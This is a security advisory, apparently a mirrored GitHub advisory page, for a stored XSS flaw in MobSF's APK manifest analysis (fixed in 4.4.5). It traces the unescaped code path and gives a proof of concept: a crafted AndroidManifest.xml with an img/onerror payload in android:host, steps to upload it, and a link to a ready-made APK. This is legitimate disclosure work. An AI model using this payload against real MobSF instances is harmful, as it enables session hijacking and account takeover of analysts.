GHSA-8HF7-H89P-3PQJ

Vulnerability from github – Published: 2026-01-26 23:36 – Updated: 2026-01-26 23:36
VLAI?
Summary
MobSF has Stored XSS via Manifest Analysis - Dialer Code Host Field
Details

Summary

A Stored Cross-site Scripting (XSS) vulnerability in MobSF's Android manifest analysis allows an attacker to execute arbitrary JavaScript in the context of a victim's browser session by uploading a malicious APK. The android:host attribute from <data android:scheme="android_secret_code"> elements is rendered in HTML reports without sanitization, enabling session hijacking and account takeover.

Details

When MobSF analyzes an Android APK containing a <data> element with android:scheme="android_secret_code", it extracts the android:host attribute and inserts it directly into the analysis report without HTML escaping.

Vulnerable Code Path

1. Data Extraction - mobsf/StaticAnalyzer/views/android/manifest_analysis.py (line 776):

xmlhost = data.getAttribute(f'{ns}:host')
ret_list.append(('dialer_code_found', (xmlhost,), ()))

2. Template String Formatting - mobsf/StaticAnalyzer/views/android/manifest_analysis.py (line 806):

'title': a_template['title'] % t_name,  # XSS payload inserted here unescaped

3. Template Definition - mobsf/StaticAnalyzer/views/android/kb/android_manifest_desc.py (line 200):

'dialer_code_found': {
    'title': 'Dailer Code: %s Found <br>[android:scheme=\"android_secret_code\"]',
    ...
}

4. Unsafe Rendering - mobsf/templates/static_analysis/android_binary_analysis.html (line 1143):

{{item|key:"title" | safe}}

The |safe Django template filter bypasses auto-escaping, allowing the unescaped android:host value to be rendered as raw HTML.

PoC

Step 1: Create Malicious APK

Create an APK with the following AndroidManifest.xml:

<?xml version="1.0" encoding="utf-8"?>
<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    package="com.poc.xsstest"
    android:versionCode="1"
    android:versionName="1.0">

    <application android:label="XSS PoC Test">
        <receiver android:name=".SecretCodeReceiver" android:exported="true">
            <intent-filter>
                <action android:name="android.provider.Telephony.SECRET_CODE"/>
                <data android:scheme="android_secret_code"
                      android:host="&lt;img src=x onerror=alert(document.domain)&gt;"/>
            </intent-filter>
        </receiver>
    </application>
</manifest>

Step 2: Build the APK

Use apktool or Android build tools to create a valid APK with this manifest.

Step 3: Upload to MobSF

Upload the malicious APK to MobSF for static analysis.

Step 4: Trigger XSS

View the static analysis report in a browser. The JavaScript payload executes automatically.

Confirmed HTML Output

<td>
Dailer Code: <img src=x onerror=alert(document.domain)> Found <br>[android:scheme="android_secret_code"]
</td>

PoC APK Details

Field Value
Filename POC_XSS_APK.apk
MD5 Hash 647258656ed03a7e6a0f2acce4ec6a5b
Location https://github.com/smaranchand/poc/raw/refs/heads/main/POC_XSS_APK.apk

Impact

This is a Stored Cross-site Scripting (XSS) vulnerability affecting all MobSF users who analyze the results of the malicious APK file.

Attack Scenario

  1. Attacker crafts a malicious APK with XSS payload in the manifest
  2. Attacker submits APK to a shared MobSF instance or private mobsf instance.
  3. When any user views the analysis report, the XSS payload executes in their browser

Screenshot 2026-01-15 at 12 24 29 AM

Tested in MobSF Public Instance as well. https://mobsf.live/static_analyzer/647258656ed03a7e6a0f2acce4ec6a5b/

Screenshot 2026-01-15 at 12 24 57 AM

Severity ?
8.1 (High)
CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:H/I:H/A:N
Show details on source website
To clipboard 

{
  "affected": [
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "mobsf"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "4.4.5"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-24490"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-79"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-01-26T23:36:19Z",
    "nvd_published_at": null,
    "severity": "HIGH"
  },
  "details": "### Summary\nA Stored Cross-site Scripting (XSS) vulnerability in MobSF\u0027s Android manifest analysis allows an attacker to execute arbitrary JavaScript in the context of a victim\u0027s browser session by uploading a malicious APK. The `android:host` attribute from `\u003cdata android:scheme=\"android_secret_code\"\u003e` elements is rendered in HTML reports without sanitization, enabling session hijacking and account takeover.\n\n### Details\nWhen MobSF analyzes an Android APK containing a `\u003cdata\u003e` element with `android:scheme=\"android_secret_code\"`, it extracts the `android:host` attribute and inserts it directly into the analysis report without HTML escaping.\n\n### Vulnerable Code Path\n\n**1. Data Extraction** - `mobsf/StaticAnalyzer/views/android/manifest_analysis.py` (line 776):\n```python\nxmlhost = data.getAttribute(f\u0027{ns}:host\u0027)\nret_list.append((\u0027dialer_code_found\u0027, (xmlhost,), ()))\n```\n\n**2. Template String Formatting** - `mobsf/StaticAnalyzer/views/android/manifest_analysis.py` (line 806):\n```python\n\u0027title\u0027: a_template[\u0027title\u0027] % t_name,  # XSS payload inserted here unescaped\n```\n\n**3. Template Definition** - `mobsf/StaticAnalyzer/views/android/kb/android_manifest_desc.py` (line 200):\n```python\n\u0027dialer_code_found\u0027: {\n    \u0027title\u0027: \u0027Dailer Code: %s Found \u003cbr\u003e[android:scheme=\\\"android_secret_code\\\"]\u0027,\n    ...\n}\n```\n\n**4. Unsafe Rendering** - `mobsf/templates/static_analysis/android_binary_analysis.html` (line 1143):\n```html\n{{item|key:\"title\" | safe}}\n```\n\nThe `|safe` Django template filter bypasses auto-escaping, allowing the unescaped `android:host` value to be rendered as raw HTML.\n\n### PoC\n\n### Step 1: Create Malicious APK\n\nCreate an APK with the following `AndroidManifest.xml`:\n\n```xml\n\u003c?xml version=\"1.0\" encoding=\"utf-8\"?\u003e\n\u003cmanifest xmlns:android=\"http://schemas.android.com/apk/res/android\"\n    package=\"com.poc.xsstest\"\n    android:versionCode=\"1\"\n    android:versionName=\"1.0\"\u003e\n\n    \u003capplication android:label=\"XSS PoC Test\"\u003e\n        \u003creceiver android:name=\".SecretCodeReceiver\" android:exported=\"true\"\u003e\n            \u003cintent-filter\u003e\n                \u003caction android:name=\"android.provider.Telephony.SECRET_CODE\"/\u003e\n                \u003cdata android:scheme=\"android_secret_code\"\n                      android:host=\"\u0026lt;img src=x onerror=alert(document.domain)\u0026gt;\"/\u003e\n            \u003c/intent-filter\u003e\n        \u003c/receiver\u003e\n    \u003c/application\u003e\n\u003c/manifest\u003e\n```\n\n### Step 2: Build the APK\n\nUse apktool or Android build tools to create a valid APK with this manifest.\n\n### Step 3: Upload to MobSF\n\nUpload the malicious APK to MobSF for static analysis.\n\n### Step 4: Trigger XSS\n\nView the static analysis report in a browser. The JavaScript payload executes automatically.\n\n### Confirmed HTML Output\n\n```html\n\u003ctd\u003e\nDailer Code: \u003cimg src=x onerror=alert(document.domain)\u003e Found \u003cbr\u003e[android:scheme=\"android_secret_code\"]\n\u003c/td\u003e\n```\n\n### PoC APK Details\n\n| Field | Value |\n|-------|-------|\n| **Filename** | `POC_XSS_APK.apk ` |\n| **MD5 Hash** | `647258656ed03a7e6a0f2acce4ec6a5b` |\n| **Location** | https://github.com/smaranchand/poc/raw/refs/heads/main/POC_XSS_APK.apk |\n\n### Impact\n\nThis is a **Stored Cross-site Scripting (XSS)** vulnerability affecting all MobSF users who analyze the results of the malicious APK file.\n\n### Attack Scenario\n\n1. Attacker crafts a malicious APK with XSS payload in the manifest\n2. Attacker submits APK to a shared MobSF instance or  private mobsf instance. \n3. When any user views the analysis report, the XSS payload executes in their browser\n\n\u003cimg width=\"1435\" height=\"675\" alt=\"Screenshot 2026-01-15 at 12 24 29\u202fAM\" src=\"https://github.com/user-attachments/assets/e282a0b2-236e-4199-a7ce-b96017cc7052\" /\u003e\n\n\nTested in MobSF Public Instance as well.\nhttps://mobsf.live/static_analyzer/647258656ed03a7e6a0f2acce4ec6a5b/ \n\n\n\u003cimg width=\"1440\" height=\"780\" alt=\"Screenshot 2026-01-15 at 12 24 57\u202fAM\" src=\"https://github.com/user-attachments/assets/8673b76a-954a-45e7-833a-a64e0a972f2e\" /\u003e",
  "id": "GHSA-8hf7-h89p-3pqj",
  "modified": "2026-01-26T23:36:19Z",
  "published": "2026-01-26T23:36:19Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/MobSF/Mobile-Security-Framework-MobSF/security/advisories/GHSA-8hf7-h89p-3pqj"
    },
    {
      "type": "WEB",
      "url": "https://github.com/MobSF/Mobile-Security-Framework-MobSF/commit/2b08dd050e7685ee2a14fdbb454affab94129eae"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/MobSF/Mobile-Security-Framework-MobSF"
    },
    {
      "type": "WEB",
      "url": "https://github.com/MobSF/Mobile-Security-Framework-MobSF/releases/tag/v4.4.5"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:H/I:H/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "MobSF has Stored XSS via Manifest Analysis - Dialer Code Host Field"
}


Log in or create an account to share your comment.




Tags
Taxonomy of the tags.




Sightings

Author Source Type Date

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or observed by the user.
  • Confirmed: The vulnerability has been validated from an analyst's perspective.
  • Published Proof of Concept: A public proof of concept is available for this vulnerability.
  • Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
  • Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
  • Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
  • Not confirmed: The user expressed doubt about the validity of the vulnerability.
  • Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.



Detection rules are retrieved from Rulezet.